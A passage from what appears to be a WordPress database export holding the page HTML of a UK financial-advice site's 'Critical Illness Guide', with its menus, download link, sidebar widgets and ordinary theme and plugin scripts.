Life Plan</a></li>&#13;\n		<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\"><span class=\"fusion-megamenu-bullet\"/>Life Insurance</a></li>&#13;\n		<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\"><span class=\"fusion-megamenu-bullet\"/>Business Protection</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"/category/video-2\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"/pension-reforms-offer-freedom-savers\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"/staging-date-social-advisors\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"/automatic-enrolment\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"/our-blog\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"/category/annuities\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"/category/insurance-protection\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"/category/investments\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"/category/pensions\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"/category/trusts\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"/category/wealth-management\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Critical Illness Guide										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a> /  <a href=\"/\" rel=\"tag\">Insurance</a></li><li>Critical Illness Guide</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n			<div id=\"content\" class=\"portfolio-full with-sidebar\" style=\"float:left;\">&#13;\n										<div class=\"single-navigation clearfix\">&#13;\n									<a href=\"/portfolio-items/guide-auto-enrolment\" rel=\"prev\">Previous</a>&#13;\n												<a href=\"/portfolio-items/smart-money-nov-dec\" rel=\"next\">Next</a>&#13;\n					</div>&#13;\n						<div id=\"post-7055\" class=\"post-7055 avada_portfolio type-avada_portfolio status-publish has-post-thumbnail hentry\">&#13;\n									<div class=\"flexslider post-slideshow\">&#13;\n				<ul class=\"slides\"><li>&#13;\n												<a href=\"#\"/>&#13;\n											</li>&#13;\n																			</ul></div>&#13;\n																		<div class=\"project-content\">&#13;\n				<span class=\"entry-title\" style=\"display: none;\">Critical Illness Guide</span>&#13;\n				<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n				<span class=\"updated\" style=\"display: none;\">2017-10-29T12:40:31+00:00</span>&#13;\n				<div class=\"project-description post-content\" style=\"\">&#13;\n										<h3 style=\"\">Project Description&#13;\n										</h3><p><a href=\"http://www.equalitywalk.org.uk/CriticalIllnessGuide.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.equalitywalk.org.uk/CriticalIllnessGuide.pdf\']);\" target=\"_blank\">Click Here To Download Your Guide For FREE</a>.</p>&#13;\n				</div>&#13;\n								<div class=\"project-info\" style=\"\">&#13;\n					<p>Project Details</p>&#13;\n															<div class=\"project-info-box\">&#13;\n						<h4>Categories:</h4>&#13;\n						<div class=\"project-terms\">&#13;\n							<a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a><br/><a href=\"/\" rel=\"tag\">Insurance</a>						</div>&#13;\n					</div>&#13;\n																													</div>&#13;\n							</div>&#13;\n			<div class=\"portfolio-sep\"/>&#13;\n						&#13;\n																				</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\"><div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"/leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/best-annuity-rates\">&#13;\n										<img width=\"52\" height=\"43\" src=\"/wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/best-annuity-rates\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/5-facts-know-annuities\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/staging-date-social-advisors\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-690.js\"/></div>&#13;\n		</div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download Your FREE Retirement Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;	Critical Illness Guide','','inherit','closed','closed','','59-revision-v1','','','2017-09-21 17:35:30','2017-09-21 17:35:30','',59,'http://www.equalitywalk.org.uk/59-revision-v1',0,'revision','',0),(327,1,'2017-09-21 17:35:45','2017-09-21 17:35:45','<body class=\"single single-post postid-554 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4746\"><a href=\"/contact-us\">Contact</a></li>&#13;\n			</ul><div class=\"mobile-topnav-holder\"/>&#13;\n	</div>			</div>&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"header-info\">CALL US FREE ON <big><big><b/></big></big><span class=\"sep\">|</span><a href=\"mailto:Enquiries@equalitywalk.org.uk\">Enquiries@equalitywalk.org.uk</a></div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"/pensions\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pensions/pension-review\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"/best-annuity-rates\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"/better-pension-drawdown-annuity\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-3 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 